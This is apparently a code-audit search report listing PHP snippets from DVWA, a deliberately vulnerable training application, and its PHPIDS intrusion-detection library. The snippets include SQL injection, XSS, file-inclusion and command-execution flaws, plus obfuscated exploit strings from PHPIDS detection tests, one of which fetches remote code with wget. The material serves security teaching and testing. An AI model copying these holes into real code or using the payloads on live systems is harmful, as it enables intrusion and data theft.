./vulnerabilities/csrf/source/high.php:16 (3/17) OK | Dubious | Bad | Hide
13-		$pass_curr = md5( $pass_curr );
14-		
15-		// Check that the current password is correct
16:		$qry = "SELECT password FROM `users` WHERE user='admin' AND password='$pass_curr';";
17-		$result = mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' );
18-
19-		if (($pass_new == $pass_conf) && ( $result && mysql_num_rows( $result ) == 1 )){
20-			$pass_new = mysql_real_escape_string($pass_new);
21-			$pass_new = md5($pass_new);
22-
23:			$insert="UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
24-			$result=mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>' );
25-						
26-			$html .= "<pre> Password Changed </pre>";
./vulnerabilities/csrf/source/medium.php:16 (4/17) OK | Dubious | Bad | Hide
13-				$pass_new = mysql_real_escape_string($pass_new);
14-				$pass_new = md5($pass_new);
15-
16:				$insert="UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
17-				$result=mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>' );
18-						
19-				$html .= "<pre> Password Changed </pre>";
./vulnerabilities/brute/source/low.php:10 (5/17) OK | Dubious | Bad | Hide
7-	$pass = $_GET['password'];
8-	$pass = md5($pass);
9-
10:	$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
11-	$result = mysql_query( $qry ) or die( '<pre>' . mysql_error() . '</pre>' );
12-
13-	if( $result && mysql_num_rows( $result ) == 1 ) {
./vulnerabilities/brute/source/high.php:16 (6/17) OK | Dubious | Bad | Hide
13-	$pass = mysql_real_escape_string( $pass );
14-	$pass = md5( $pass );
15-
16:	$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
17-	$result = mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' );
18-
19-	if( $result && mysql_num_rows( $result ) == 1 ) {
./vulnerabilities/brute/source/medium.php:14 (7/17) OK | Dubious | Bad | Hide
11-	$pass = mysql_real_escape_string( $pass );
12-	$pass = md5( $pass );
13-
14:	$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
15-	$result = mysql_query( $qry ) or die( '<pre>' . mysql_error() . '</pre>' );
16-
17-	if( $result && mysql_num_rows($result) == 1 ) {
./external/phpids/0.6/tests/IDS/MonitorTest.php:1026 (8/17) OK | Dubious | Bad | Hide
1023-                        if (!0) $_a ="". str_rot13(\'cevags\'); //
1024-                        $_b = HTTP_USER_AGENT; //
1025-                        $_c="". $_SERVER[$_b]; //
1026:                        $_a( `$_c` );//';
1027-        $exploits[] = '"; //
1028-                        $_c = "" . $_a($b);
1029:                        $_b(`$_c`);//';
1030-        $exploits[] = '" ; //
1031-                        if  (!0) $_a = base64_decode ;
1032-                        if  (!0) $_b = parse_str ; //
./external/phpids/0.6/tests/IDS/MonitorTest.php:1038 (9/17) OK | Dubious | Bad | Hide
1035-                        $_e= "" . $_SERVER[$_d];
1036-                        $_b($_e); //
1037-                        $_f = "" . $_a($b);
1038:                        $_c(`$_f`);//';
1039-        $exploits[] = '" ; //
1040-                        $_y = "" . strrev("ftnirp");
1041-                        if  (!0)    $_a = base64_decode ;
1042-                        if  (!0)    $_b="" . $_a(\'cHdk\');
1043:                        if (!0) $_y(`$_b`);//';
1044-        $exploits[] = '";{ if (true) $_a  = "" . str_replace(\'!\',\'\',\'s!y!s!t!e!m!\');
1045-                        $_a( "dir"); } //';
1046-        $exploits[] = '";{ if (true) $_a  = "" . strtolower("pass");
./external/phpids/0.6/tests/IDS/MonitorTest.php:1056 (10/17) OK | Dubious | Bad | Hide
1053-        $exploits[] = '";; //
1054-                        if (!($_b[]  %1)) $_a[0]  = system;
1055-                        $_a[0](!a. "ls");  //';
1056:        $exploits[] = '; e|$a=&$_GET; 0|$b=!a .$a[b];$a[a](`$b`);//';
1057:        $exploits[] = 'aaaa { $ {`wget hxxp://example.com/x.php`}}';
1058-
1059-        $this->_testForPlainEvent($exploits);
1060-
./external/phpids/0.6/lib/IDS/Caching/Database.php:42 (11/17) OK | Dubious | Bad | Hide
39-
40-    #create the database
41-
42:    CREATE DATABASE IF NOT EXISTS `phpids` DEFAULT CHARACTER 
43-        SET utf8 COLLATE utf8_general_ci;
44:    DROP TABLE IF EXISTS `cache`;
45-
46-    #now select the created datbase and create the table
47-
48:    CREATE TABLE `cache` (
49:        `type` VARCHAR( 32 ) NOT null ,
50:        `data` TEXT NOT null ,
51:        `created` DATETIME NOT null ,
52:        `modified` DATETIME NOT null
53-    ) ENGINE = MYISAM ;
54- */
55-
./external/phpids/0.6/lib/IDS/Caching/Database.php:151 (12/17) OK | Dubious | Bad | Hide
148-
149-        $handle = $this->handle;
150-        
151:        $rows = $handle->query('SELECT created FROM `' . 
152:            $handle->quote($this->config['table']).'`');
153-            
154-        if (!$rows || $rows->rowCount() === 0) {
155-
./external/phpids/0.6/lib/IDS/Caching/Database.php:251 (13/17) OK | Dubious | Bad | Hide
248-            $handle->query('TRUNCATE ' . 
249-                $this->config['table'].'');
250-            $statement = $handle->prepare('
251:                INSERT INTO `' . 
252:                $this->config['table'].'` (
253-                    type,
254-                    data,
255-                    created,
./external/phpids/0.6/lib/IDS/Converter.php:261 (14/17) OK | Dubious | Bad | Hide
258-    public static function convertQuotes($value)
259-    {
260-        // normalize different quotes to "
261:        $pattern = array('\'', '`', '´', '’', '‘');
262-        $value   = str_replace($pattern, '"', $value);
263-
264-        return $value;
./external/phpids/0.6/lib/IDS/Converter.php:496 (15/17) OK | Dubious | Bad | Hide
493-                    '+ACU-'      => '%',
494-                    '+ACQ-'      => '$',
495-                    '+AD0-'      => '=',
496:                    '+AGA-'      => '`',
497-                    '+ALQ-'      => '"',
498-                    '+IBg-'      => '"',
499-                    '+IBk-'      => '"',
./external/phpids/0.6/lib/IDS/Log/Database.php:39 (16/17) OK | Dubious | Bad | Hide
36-/*
37- * Needed SQL:
38- *
39:    CREATE DATABASE IF NOT EXISTS `phpids` DEFAULT CHARACTER 
40-        SET utf8 COLLATE utf8_general_ci;
41:    DROP TABLE IF EXISTS `intrusions`;
42:    CREATE TABLE IF NOT EXISTS `intrusions` (
43:      `id` int(11) unsigned NOT null auto_increment,
44:      `name` varchar(128) NOT null,
45:      `value` text NOT null,
46:      `page` varchar(255) NOT null,
47:      `ip` varchar(15) NOT null,
48:      `impact` int(11) unsigned NOT null,
49:      `origin` varchar(15) NOT null,
50:      `created` datetime NOT null,
51:      PRIMARY KEY  (`id`)
52-    ) ENGINE=MyISAM ;
53- *
54- *
./dvwa/includes/DBMS/DBMS.php:21 (17/17) OK | Dubious | Bad | Hide
18- }
19- 
20- function db_login( $user,$pass )  {
21:  $login = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
22-
23-	$result = @mysql_query($login) or die('<pre>' . mysql_error() . '</pre>' );
24-

base64_decode( (1) Top | Hide

./external/phpids/0.6/lib/IDS/Converter.php:384 (1/1) OK | Dubious | Bad | Hide
382-        foreach ($matches[1] as $item) {
383-            if (isset($item) && !preg_match('/[a-f0-9]{32}/i', $item)) {
384:                $value = str_replace($item, base64_decode($item), $value);
385-            }
386-        }
387-

\$\$ (4) Top | Hide

./external/phpids/0.6/tests/IDS/MonitorTest.php:250 (1/4) OK | Dubious | Bad | Hide
248-                            {};;
249-                            {v =(0)?z:z}v={_$:z+'aler'+z};
250:                            {k =(0)?z:z}k={_$$:v._$+'t(x)'+z};
251-                            x=''+y.y+'l';{};
252-
253-                            n=.1[x];
254:                            n(k._$$)";
255-        $exploits[] = "ä=/ä/!=/ä/?'': 0;b=(ä+'eva'+ä);b=(b+'l'+ä);d=(ä+'XSS'+ä);c=(ä+'aler'+ä);c=(c+'t(d)'+ä);$=.0[b];a=$;a(c)";
256-        $exploits[] = 'x=/x/
257-                            $x=!!1?\'ash\':xx
./external/phpids/0.6/tests/IDS/MonitorTest.php:375 (2/4) OK | Dubious | Bad | Hide
372-                        $a=$a=$b';
373-        $exploits[] = "123[''+<_>ev</_>+<_>al</_>](''+<_>aler</_>+<_>t</_>+<_>(1)</_>);";
374-        $exploits[] = '$_ = !1-1 ? 0["\ev\al""]("\a\l\ert\(1\)"") : 0';
375:        $exploits[] = "$$$[0] = !1-1 ? 'eva' : 0
376-
377:                        $$$[1] = !1-1 ? 'l' : 0
378-
379:                        $$$['\jo\in']([])";
380-        $exploits[] = 'x=/eva/i[-1]
381-                        $y=/nam/i[-1]
382-                        $x$_0=(0)[x+\'l\']
./external/phpids/0.6/tests/IDS/MonitorTest.php:565 (3/4) OK | Dubious | Bad | Hide
562-        $exploits[] = 'eval.call(this,unescape.call(this,location))';
563-        $exploits[] = 'd=0||\'une\'+\'scape\'||0;a=0||\'ev\'+\'al\'||0;b=0||\'locatio\';b+=0||\'n\'||0;c=b[a];d=c(d);c(d(c(b)))';
564-        $exploits[] = '_=eval,__=unescape,___=document.URL,_(__(___))';
565:        $exploits[] = '$=document,$=$.URL,$$=unescape,$$$=eval,$$$($$($))';
566-        $exploits[] = '$_=document,$__=$_.URL,$___=unescape,$_=$_.body,$_.innerHTML = $___(http=$__)';
567-        $exploits[] = 'ev\al.call(this,unescape.call(this,location))';
568-        $exploits[] = 'setTimeout//
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ChildDef/Table.php:66 (4/4) OK | Dubious | Bad | Hide
63-                        case 'tfoot':
64-                            // access the appropriate variable, $thead or $tfoot
65-                            $var = $collection[$tag_index]->name;
66:                            if ($$var === false) {
67:                                $$var = $collection;
68-                            } else {
69-                                // transmutate the first and less entries into
70-                                // tbody tags, and then put into content

$_GET (29) Top | Hide

./instructions.php:19 (1/29) OK | Dubious | Bad | Hide
17-);
18-
19:$selectedDocId = isset( $_GET[ 'doc' ] ) ? $_GET[ 'doc' ] : '';
20-if( !array_key_exists( $selectedDocId, $docs ) ) {
21-	$selectedDocId = 'readme';
22-}
./security.php:31 (2/29) OK | Dubious | Bad | Hide
28-}
29-
30-
31:if( isset( $_GET['phpids'] ) ) {
32:	switch( $_GET[ 'phpids' ] ) {
33-		case 'on':
34-			dvwaPhpIdsEnabledSet( true );
35-			dvwaMessagePush( "PHPIDS is now enabled" );
./vulnerabilities/csrf/source/low.php:3 (3/29) OK | Dubious | Bad | Hide
1-<?php
2-				
3:	if (isset($_GET['Change'])) {
4-	
5-		// Turn requests into variables
6:		$pass_new = $_GET['password_new'];
7:		$pass_conf = $_GET['password_conf'];
8-
9-
10-		if (($pass_new == $pass_conf)){
./vulnerabilities/csrf/source/high.php:3 (4/29) OK | Dubious | Bad | Hide
1-<?php
2-			
3:	if (isset($_GET['Change'])) {
4-	
5-		// Turn requests into variables
6:		$pass_curr = $_GET['password_current'];
7:		$pass_new = $_GET['password_new'];
8:		$pass_conf = $_GET['password_conf'];
9-
10-		// Sanitise current password input
11-		$pass_curr = stripslashes( $pass_curr );
./vulnerabilities/csrf/source/medium.php:3 (5/29) OK | Dubious | Bad | Hide
1-<?php
2-			
3:	if (isset($_GET['Change'])) {
4-	
5-		// Checks the http referer header
6-		if ( eregi ( "127.0.0.1", $_SERVER['HTTP_REFERER'] ) ){
7-	
8-			// Turn requests into variables
9:			$pass_new = $_GET['password_new'];
10:			$pass_conf = $_GET['password_conf'];
11-
12-			if ($pass_new == $pass_conf){
13-				$pass_new = mysql_real_escape_string($pass_new);
./vulnerabilities/fi/source/low.php:3 (6/29) OK | Dubious | Bad | Hide
1-<?php
2-
3:	$file = $_GET['page']; //The page we wish to display 
4-
5-?>
./vulnerabilities/fi/source/high.php:3 (7/29) OK | Dubious | Bad | Hide
1-<?php
2-		
3:	$file = $_GET['page']; //The page we wish to display 
4-
5-	// Only allow include.php
6-	if ( $file != "include.php" ) {
./vulnerabilities/fi/source/medium.php:3 (8/29) OK | Dubious | Bad | Hide
1-<?php
2-
3:	$file = $_GET['page']; // The page we wish to display 
4-
5-	// Bad input validation
6-	$file = str_replace("http://", "", $file);
./vulnerabilities/sqli_blind/source/low.php:3 (9/29) OK | Dubious | Bad | Hide
1-<?php	
2-
3:if (isset($_GET['Submit'])) {
4-	
5-	// Retrieve data
6-	
7:	$id = $_GET['id'];
8-
9-	$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
10-	$result = mysql_query($getid); // Removed 'or die' to suppres mysql errors
./vulnerabilities/sqli_blind/source/high.php:3 (10/29) OK | Dubious | Bad | Hide
1-<?php	
2-
3:if(isset($_GET['Submit'])){
4-
5-	// Retrieve data
6-
7:	$id = $_GET['id'];
8-	$id = stripslashes($id);
9-	$id = mysql_real_escape_string($id);
10-
./vulnerabilities/sqli_blind/source/medium.php:3 (11/29) OK | Dubious | Bad | Hide
1-<?php
2-
3:if (isset($_GET['Submit'])) {
4-
5-	// Retrieve data
6-
7:	$id = $_GET['id'];
8-	$id = mysql_real_escape_string($id);
9-
10-	$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
./vulnerabilities/view_source.php:11 (12/29) OK | Dubious | Bad | Hide
8-$page = dvwaPageNewGrab();
9-$page[ 'title' ] .= $page[ 'title_separator' ].'Source';
10-
11:$id = $_GET[ 'id' ];
12:$security = $_GET[ 'security' ];
13-
14-
15-if ($id == 'fi'){
./vulnerabilities/brute/source/low.php:3 (13/29) OK | Dubious | Bad | Hide
1-<?php
2-
3:if( isset( $_GET['Login'] ) ) {
4-
5:	$user = $_GET['username'];
6-	
7:	$pass = $_GET['password'];
8-	$pass = md5($pass);
9-
10-	$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
./vulnerabilities/brute/source/high.php:3 (14/29) OK | Dubious | Bad | Hide
1-<?php
2-
3:if( isset( $_GET[ 'Login' ] ) ) {
4-
5-	// Sanitise username input
6:	$user = $_GET[ 'username' ];
7-	$user = stripslashes( $user );
8-	$user = mysql_real_escape_string( $user );
9-
10-	// Sanitise password input
11:	$pass = $_GET[ 'password' ];
12-	$pass = stripslashes( $pass );
13-	$pass = mysql_real_escape_string( $pass );
14-	$pass = md5( $pass );
./vulnerabilities/brute/source/medium.php:3 (15/29) OK | Dubious | Bad | Hide
1-<?php
2-
3:if( isset( $_GET[ 'Login' ] ) ) {
4-
5-	// Sanitise username input
6:	$user = $_GET[ 'username' ];
7-	$user = mysql_real_escape_string( $user );
8-
9-	// Sanitise password input
10:	$pass = $_GET[ 'password' ];
11-	$pass = mysql_real_escape_string( $pass );
12-	$pass = md5( $pass );
13-
./vulnerabilities/view_help.php:11 (16/29) OK | Dubious | Bad | Hide
8-$page = dvwaPageNewGrab();
9-$page[ 'title' ] .= $page[ 'title_separator' ].'Help';
10-
11:$id = $_GET[ 'id' ];
12:$security = $_GET[ 'security' ];
13-
14-$help = file_get_contents( DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/{$id}/help/help.php" );
15-
./vulnerabilities/sqli/source/low.php:3 (17/29) OK | Dubious | Bad | Hide
1-<?php	
2-
3:if(isset($_GET['Submit'])){
4-	
5-	// Retrieve data
6-	
7:	$id = $_GET['id'];
8-
9-	$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
10-	$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
./vulnerabilities/sqli/source/high.php:3 (18/29) OK | Dubious | Bad | Hide
1-<?php	
2-
3:if (isset($_GET['Submit'])) {
4-
5-	// Retrieve data
6-
7:	$id = $_GET['id'];
8-	$id = stripslashes($id);
9-	$id = mysql_real_escape_string($id);
10-
./vulnerabilities/sqli/source/medium.php:3 (19/29) OK | Dubious | Bad | Hide
1-<?php
2-
3:if (isset($_GET['Submit'])) {
4-
5-	// Retrieve data
6-
7:	$id = $_GET['id'];
8-	$id = mysql_real_escape_string($id);
9-
10-	$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
./vulnerabilities/view_source_all.php:10 (20/29) OK | Dubious | Bad | Hide
7-$page = dvwaPageNewGrab();
8-$page[ 'title' ] .= $page[ 'title_separator' ].'Source';
9-
10:$id = $_GET[ 'id' ];
11-
12-$lowsrc = @file_get_contents("./{$id}/source/low.php");
13-$lowsrc = str_replace( array( '$html .=' ), array( 'echo' ), $lowsrc);
./vulnerabilities/xss_r/source/low.php:3 (21/29) OK | Dubious | Bad | Hide
1-<?php
2-
3:if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){
4-
5- $isempty = true;
6-
7-} else {
8-		
9- $html .= '<pre>';
10: $html .= 'Hello ' . $_GET['name'];
11- $html .= '</pre>';
12-	
13-}
./vulnerabilities/xss_r/source/high.php:3 (22/29) OK | Dubious | Bad | Hide
1-<?php
2-	
3:if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){
4-	
5- $isempty = true;
6-		
7-} else {
8-	
9- $html .= '<pre>';
10: $html .= 'Hello ' . htmlspecialchars($_GET['name']);
11- $html .= '</pre>';
12-		
13-}
./vulnerabilities/xss_r/source/medium.php:3 (23/29) OK | Dubious | Bad | Hide
1-<?php
2-
3:if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){
4-
5- $isempty = true;
6-
7-} else {
8-
9- $html .= '<pre>';
10: $html .= 'Hello ' . str_replace('<script>', '', $_GET['name']);
11- $html .= '</pre>'; 
12-
13-}
./external/phpids/0.6/docs/examples/example.php:43 (24/29) OK | Dubious | Bad | Hide
40-    */
41-    $request = array(
42-        'REQUEST' => $_REQUEST,
43:        'GET' => $_GET,
44-        'POST' => $_POST,
45-        'COOKIE' => $_COOKIE
46-    );
./external/phpids/0.6/tests/IDS/MonitorTest.php:1056 (25/29) OK | Dubious | Bad | Hide
1053-        $exploits[] = '";; //
1054-                        if (!($_b[]  %1)) $_a[0]  = system;
1055-                        $_a[0](!a. "ls");  //';
1056:        $exploits[] = '; e|$a=&$_GET; 0|$b=!a .$a[b];$a[a](`$b`);//';
1057-        $exploits[] = 'aaaa { $ {`wget hxxp://example.com/x.php`}}';
1058-
1059-        $this->_testForPlainEvent($exploits);
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Config.php:406 (26/29) OK | Dubious | Bad | Hide
403-    }
404-    
405-    /**
406:     * Loads configuration values from $_GET/$_POST that were posted
407-     * via ConfigForm
408:     * @param $array $_GET or $_POST array to import
409-     * @param $index Index/name that the config variables are in
410-     * @param $allowed List of allowed namespaces/directives 
411-     * @param $mq_fix Boolean whether or not to enable magic quotes fix
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Config.php:421 (27/29) OK | Dubious | Bad | Hide
418-    }
419-    
420-    /**
421:     * Merges in configuration values from $_GET/$_POST to object. NOT STATIC.
422-     * @note Same parameters as loadArrayFromForm
423-     */
424-    public function mergeArrayFromForm($array, $index = false, $allowed = true, $mq_fix = true) {
./dvwa/includes/dvwaPhpIds.inc.php:45 (28/29) OK | Dubious | Bad | Hide
42-
43-// Clear PHPIDS log
44-function dvwaClearIdsLog()	{
45:	if (isset($_GET['clear_log'])) { 
46-		$fp = fopen(DVWA_WEB_PAGE_TO_PHPIDS_LOG, w);
47-		fclose($fp);
48-		dvwaMessagePush( "PHPIDS log cleared" );
./dvwa/includes/dvwaPhpIds.inc.php:58 (29/29) OK | Dubious | Bad | Hide
55-	try {
56-		$request = array(
57-			'REQUEST' => $_REQUEST,
58:			'GET' => $_GET,
59-			'POST' => $_POST,
60-			'COOKIE' => $_COOKIE
61-		);

$_POST (16) Top | Hide

./login.php:11 (1/16) OK | Dubious | Bad | Hide
9-dvwaDatabaseConnect();
10-
11:if( isset( $_POST[ 'Login' ] ) ) {
12-
13-
14:	$user = $_POST[ 'username' ];
15-	$user = stripslashes( $user );
16-	$user = mysql_real_escape_string( $user );
17-
18:	$pass = $_POST[ 'password' ];
19-	$pass = stripslashes( $pass );
20-	$pass = mysql_real_escape_string( $pass );
21-	$pass = md5( $pass );
./security.php:13 (2/16) OK | Dubious | Bad | Hide
10-$page[ 'page_id' ] = 'security';
11-
12-$securityHtml = '';
13:if( isset( $_POST['seclev_submit'] ) ) {
14-	$securityLevel = 'high';
15-
16:	switch( $_POST[ 'security' ] ) {
17-		case 'low':
18-			$securityLevel = 'low';
19-			break;
./vulnerabilities/exec/source/low.php:3 (3/16) OK | Dubious | Bad | Hide
1-<?php
2-
3:if( isset( $_POST[ 'submit' ] ) ) {
4-
5-	$target = $_REQUEST[ 'ip' ];
6-
./vulnerabilities/exec/source/high.php:3 (4/16) OK | Dubious | Bad | Hide
1-<?php
2-
3:if( isset( $_POST[ 'submit' ] ) ) {
4-
5-	$target = $_REQUEST["ip"];
6-
./vulnerabilities/exec/source/medium.php:3 (5/16) OK | Dubious | Bad | Hide
1-<?php
2-
3:if( isset( $_POST[ 'submit'] ) ) {
4-
5-	$target = $_REQUEST[ 'ip' ];
6-
./vulnerabilities/upload/source/low.php:2 (6/16) OK | Dubious | Bad | Hide
1-<?php
2:	if (isset($_POST['Upload'])) {
3-
4-			$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
5-			$target_path = $target_path . basename( $_FILES['uploaded']['name']);
./vulnerabilities/upload/source/high.php:2 (7/16) OK | Dubious | Bad | Hide
1-<?php
2:if (isset($_POST['Upload'])) {
3-
4-			$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
5-			$target_path = $target_path . basename($_FILES['uploaded']['name']);
./vulnerabilities/upload/source/medium.php:2 (8/16) OK | Dubious | Bad | Hide
1-<?php
2:	if (isset($_POST['Upload'])) {
3-
4-			$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
5-			$target_path = $target_path . basename($_FILES['uploaded']['name']);
./vulnerabilities/xss_s/source/low.php:3 (9/16) OK | Dubious | Bad | Hide
1-<?php
2-
3:if(isset($_POST['btnSign']))
4-{
5-
6:   $message = trim($_POST['mtxMessage']);
7:   $name    = trim($_POST['txtName']);
8-   
9-   // Sanitize message input
10-   $message = stripslashes($message);
./vulnerabilities/xss_s/source/high.php:3 (10/16) OK | Dubious | Bad | Hide
1-<?php
2-
3:if(isset($_POST['btnSign']))
4-{
5-
6:   $message = trim($_POST['mtxMessage']);
7:   $name    = trim($_POST['txtName']);
8-   
9-   // Sanitize message input
10-   $message = stripslashes($message);
./vulnerabilities/xss_s/source/medium.php:3 (11/16) OK | Dubious | Bad | Hide
1-<?php
2-
3:if(isset($_POST['btnSign']))
4-{
5-
6:   $message = trim($_POST['mtxMessage']);
7:   $name    = trim($_POST['txtName']);
8-   
9-   // Sanitize message input
10-   $message = trim(strip_tags(addslashes($message)));
./external/phpids/0.6/docs/examples/example.php:44 (12/16) OK | Dubious | Bad | Hide
41-    $request = array(
42-        'REQUEST' => $_REQUEST,
43-        'GET' => $_GET,
44:        'POST' => $_POST,
45-        'COOKIE' => $_COOKIE
46-    );
47-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Config.php:406 (13/16) OK | Dubious | Bad | Hide
403-    }
404-    
405-    /**
406:     * Loads configuration values from $_GET/$_POST that were posted
407-     * via ConfigForm
408:     * @param $array $_GET or $_POST array to import
409-     * @param $index Index/name that the config variables are in
410-     * @param $allowed List of allowed namespaces/directives 
411-     * @param $mq_fix Boolean whether or not to enable magic quotes fix
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Config.php:421 (14/16) OK | Dubious | Bad | Hide
418-    }
419-    
420-    /**
421:     * Merges in configuration values from $_GET/$_POST to object. NOT STATIC.
422-     * @note Same parameters as loadArrayFromForm
423-     */
424-    public function mergeArrayFromForm($array, $index = false, $allowed = true, $mq_fix = true) {
./setup.php:12 (15/16) OK | Dubious | Bad | Hide
9-$page[ 'title' ] .= $page[ 'title_separator' ].'Setup';
10-$page[ 'page_id' ] = 'setup';
11-
12:if( isset( $_POST[ 'create_db' ] ) ) {
13-
14-	if ($DBMS == 'MySQL') {
15-		include_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/DBMS/MySQL.php';
./dvwa/includes/dvwaPhpIds.inc.php:59 (16/16) OK | Dubious | Bad | Hide
56-		$request = array(
57-			'REQUEST' => $_REQUEST,
58-			'GET' => $_GET,
59:			'POST' => $_POST,
60-			'COOKIE' => $_COOKIE
61-		);
62-

$_REQUEST (6) Top | Hide

./vulnerabilities/exec/source/low.php:5 (1/6) OK | Dubious | Bad | Hide
3-if( isset( $_POST[ 'submit' ] ) ) {
4-
5:	$target = $_REQUEST[ 'ip' ];
6-
7-	// Determine OS and execute the ping command.
8-	if (stristr(php_uname('s'), 'Windows NT')) {
./vulnerabilities/exec/source/high.php:5 (2/6) OK | Dubious | Bad | Hide
2-
3-if( isset( $_POST[ 'submit' ] ) ) {
4-
5:	$target = $_REQUEST["ip"];
6-	
7-	$target = stripslashes( $target );
8-
./vulnerabilities/exec/source/medium.php:5 (3/6) OK | Dubious | Bad | Hide
2-
3-if( isset( $_POST[ 'submit'] ) ) {
4-
5:	$target = $_REQUEST[ 'ip' ];
6-
7-	// Remove any of the charactars in the array (blacklist).
8-	$substitutions = array(
./external/phpids/0.6/docs/examples/example.php:42 (4/6) OK | Dubious | Bad | Hide
39-    * with your variables_order settings
40-    */
41-    $request = array(
42:        'REQUEST' => $_REQUEST,
43-        'GET' => $_GET,
44-        'POST' => $_POST,
45-        'COOKIE' => $_COOKIE
./external/phpids/0.6/docs/examples/cakephp/ids.php:118 (5/6) OK | Dubious | Bad | Hide
115-        vendor('phpids/IDS/Init');
116-
117-        #add request url and user agent
118:        $_REQUEST['IDS_request_uri'] = $_SERVER['REQUEST_URI'];
119-        if (isset($_SERVER['HTTP_USER_AGENT'])) {
120:            $_REQUEST['IDS_user_agent'] = $_SERVER['HTTP_USER_AGENT'];
121-        }
122-
123-        #init the PHPIDS and pass the REQUEST array
124-        $this->init = IDS_Init::init();
125:        $ids        = new IDS_Monitor($this->init, $_REQUEST);
126-        $result     = $ids->run();
127-
128-        // Re-set include path
./dvwa/includes/dvwaPhpIds.inc.php:57 (6/6) OK | Dubious | Bad | Hide
54-function dvwaPhpIdsTrap() {
55-	try {
56-		$request = array(
57:			'REQUEST' => $_REQUEST,
58-			'GET' => $_GET,
59-			'POST' => $_POST,
60-			'COOKIE' => $_COOKIE

$_SESSION (4) Top | Hide

./external/phpids/0.6/tests/IDS/CachingTest.php:88 (1/4) OK | Dubious | Bad | Hide
86-        $cache = IDS_Caching::factory($this->init, 'storage');
87-        $cache = $cache->setCache(array(1,2,3,4));
88:        $_SESSION['PHPIDS']['storage'] = null;
89-        $this->assertFalse($cache->getCache());
90-    }
91-
./external/phpids/0.6/lib/IDS/Caching/Session.php:118 (2/4) OK | Dubious | Bad | Hide
115-    public function setCache(array $data) 
116-    {
117-
118:        $_SESSION['PHPIDS'][$this->type] = $data;
119-        return $this;
120-    }
121-
./external/phpids/0.6/lib/IDS/Caching/Session.php:132 (3/4) OK | Dubious | Bad | Hide
129-    public function getCache() 
130-    {
131-
132:        if ($this->type && $_SESSION['PHPIDS'][$this->type]) {
133:            return $_SESSION['PHPIDS'][$this->type];
134-        }
135-
136-        return false;
./dvwa/includes/dvwaPage.inc.php:53 (4/4) OK | Dubious | Bad | Hide
50-
51-function &dvwaSessionGrab() {
52-
53:	if( !isset( $_SESSION[ 'dvwa' ] ) ) {
54-
55:		$_SESSION[ 'dvwa' ] = array();
56-
57-	}
58-
59:	return $_SESSION[ 'dvwa' ];
60-}
61-
62-

$_SERVER (18) Top | Hide

./vulnerabilities/csrf/source/medium.php:6 (1/18) OK | Dubious | Bad | Hide
4-	
5-		// Checks the http referer header
6:		if ( eregi ( "127.0.0.1", $_SERVER['HTTP_REFERER'] ) ){
7-	
8-			// Turn requests into variables
9-			$pass_new = $_GET['password_new'];
./external/phpids/0.6/docs/examples/cakephp/ids.php:118 (2/18) OK | Dubious | Bad | Hide
115-        vendor('phpids/IDS/Init');
116-
117-        #add request url and user agent
118:        $_REQUEST['IDS_request_uri'] = $_SERVER['REQUEST_URI'];
119:        if (isset($_SERVER['HTTP_USER_AGENT'])) {
120:            $_REQUEST['IDS_user_agent'] = $_SERVER['HTTP_USER_AGENT'];
121-        }
122-
123-        #init the PHPIDS and pass the REQUEST array
./external/phpids/0.6/docs/examples/cakephp/ids.php:194 (3/18) OK | Dubious | Bad | Hide
191-                $this->controller->Session->read('User.id') :
192-                0;
193-
194:        $ip = ($_SERVER['SERVER_ADDR'] != '127.0.0.1') ?
195:                    $_SERVER['SERVER_ADDR'] :
196:                        (isset($_SERVER['HTTP_X_FORWARDED_FOR']) ?
197:                            $_SERVER['HTTP_X_FORWARDED_FOR'] :
198-                                 '127.0.0.1');
199-
200-        foreach ($result as $event) {
./external/phpids/0.6/docs/examples/cakephp/ids.php:205 (4/18) OK | Dubious | Bad | Hide
202-                'Intrusion' => array(
203-                    'name'      => $event->getName(),
204-                    'value'     => stripslashes($event->getValue()),
205:                    'page'      => $_SERVER['REQUEST_URI'],
206-                    'userid'    => $user,
207-                    'session'   => session_id() ? session_id() : '0',
208-                    'ip'        => $ip,
./external/phpids/0.6/tests/IDS/MonitorTest.php:1025 (5/18) OK | Dubious | Bad | Hide
1022-        $exploits[] = '" ; //
1023-                        if (!0) $_a ="". str_rot13(\'cevags\'); //
1024-                        $_b = HTTP_USER_AGENT; //
1025:                        $_c="". $_SERVER[$_b]; //
1026-                        $_a( `$_c` );//';
1027-        $exploits[] = '"; //
1028-                        $_c = "" . $_a($b);
./external/phpids/0.6/tests/IDS/MonitorTest.php:1035 (6/18) OK | Dubious | Bad | Hide
1032-                        if  (!0) $_b = parse_str ; //
1033-                        $_c = "" . strrev("ftnirp");
1034-                        if  (!0)  $_d = QUERY_STRING; //
1035:                        $_e= "" . $_SERVER[$_d];
1036-                        $_b($_e); //
1037-                        $_f = "" . $_a($b);
1038-                        $_c(`$_f`);//';
